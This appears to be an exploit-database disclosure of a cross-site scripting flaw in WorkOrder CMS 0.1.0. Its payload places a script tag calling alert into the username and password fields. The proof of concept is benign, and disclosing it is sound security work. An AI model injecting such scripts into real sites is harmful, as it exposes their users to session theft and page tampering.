# Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
# Software Link:
https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux
# Payload:
username:<u>test1337<script>alert('hi');</script>
password:<u>test1337<script>alert('hi');</script>